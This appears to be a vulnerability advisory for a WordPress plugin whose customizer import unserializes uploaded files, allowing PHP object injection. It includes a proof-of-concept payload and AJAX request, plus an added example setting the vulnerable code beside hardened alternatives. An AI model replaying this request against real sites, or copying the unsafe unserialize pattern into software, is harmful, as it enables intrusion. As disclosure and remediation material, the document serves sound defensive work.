The plugin unserializes the content of an imported file, which could lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog.
To simulate a gadget chain, put the following code in a plugin:

    class Evil { public function __wakeup() : void { die("Arbitrary deserialization"); } }

Create a file named import.txt with the following content and import it (Appearance > Customize > Extras, and then "Import/Export"):

    Tzo0OiJFdmlsIjowOnt9Ow==

(which is the base64 encoding of O:4:"Evil":0:{};)

The text "Arbitrary deserialization" will be displayed in the response to the AJAX request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Type: multipart/form-data; boundary=---------------------------311648694729615030513398536822
    Content-Length: 519
    Cookie: [Cookie]

    -----------------------------311648694729615030513398536822
    Content-Disposition: form-data; name="file"; filename="import.txt"
    Content-Type: text/plain

    Tzo0OiJFdmlsIjowOnt9Ow==
    -----------------------------311648694729615030513398536822
    Content-Disposition: form-data; name="action"

    auxin_customizer_import
    -----------------------------311648694729615030513398536822
    Content-Disposition: form-data; name="nonce"

    3da8669d7a
    -----------------------------311648694729615030513398536822--
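The following PHP is an added illustration, not the plugin's own code, of why the import handler described above is dangerous and how it can be hardened. The function names (import_vulnerable, import_hardened_unserialize, import_hardened_json) are assumed for the example; the Evil class and the base64 payload are the ones the report uses. The vulnerable variant hands the decoded file straight to unserialize(), so any class on the site with a __wakeup() or __destruct() runs. The first hardened variant keeps the serialize() format but passes allowed_classes => false, so PHP produces __PHP_Incomplete_Class placeholders instead of real objects and never invokes their magic methods; the second stores settings as JSON, which has no object-instantiation semantics at all.

```php
<?php
// Added example, not the plugin's code: unsafe vs. safe handling of an
// imported settings file.

// Stand-in for any class on the blog whose magic method does something
// with attacker-controlled state (the report's simulated gadget).
class Evil
{
    public function __wakeup(): void
    {
        echo "Arbitrary deserialization\n";
    }
}

// Sample import file content from the report: base64 of O:4:"Evil":0:{};
$import = 'Tzo0OiJFdmlsIjowOnt9Ow==';

// Vulnerable pattern: decoded file content reaches unserialize() unrestricted,
// so Evil::__wakeup() runs as soon as the file is imported.
function import_vulnerable(string $contents)
{
    return unserialize(base64_decode($contents));
}

// Hardened option 1: same on-disk format, but object instantiation is
// forbidden. Evil becomes a __PHP_Incomplete_Class, its __wakeup() is never
// called, and the non-array result is rejected.
function import_hardened_unserialize(string $contents): array
{
    $raw = base64_decode($contents, true);          // strict mode rejects junk
    if ($raw === false) {
        throw new InvalidArgumentException('Import is not valid base64');
    }
    $data = unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Import must decode to a settings array');
    }
    return $data;
}

// Hardened option 2 (preferable for new code): store settings as JSON.
// json_decode() with assoc=true only ever yields scalars and arrays.
function import_hardened_json(string $contents): array
{
    $data = json_decode($contents, true, 512, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Import must be a JSON object');
    }
    return $data;
}

// Demonstration against the report's payload.
import_vulnerable($import);                         // prints "Arbitrary deserialization"

try {
    import_hardened_unserialize($import);           // Evil is not instantiated
} catch (InvalidArgumentException $e) {
    echo "Rejected: {$e->getMessage()}\n";
}

try {
    import_hardened_json(base64_decode($import));   // serialized PHP is not JSON
} catch (JsonException $e) {
    echo "Rejected: not JSON\n";
}
```

In a WordPress plugin the hardened import handler should additionally run only after the nonce and a capability check (for example manage_options) succeed; the allowed_classes option alone stops object injection but does not control who may import.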
Nguyen Duy Quoc Khanh
Nguyen Duy Quoc Khanh
Yes
2022-11-17
2022-11-17
2023-01-23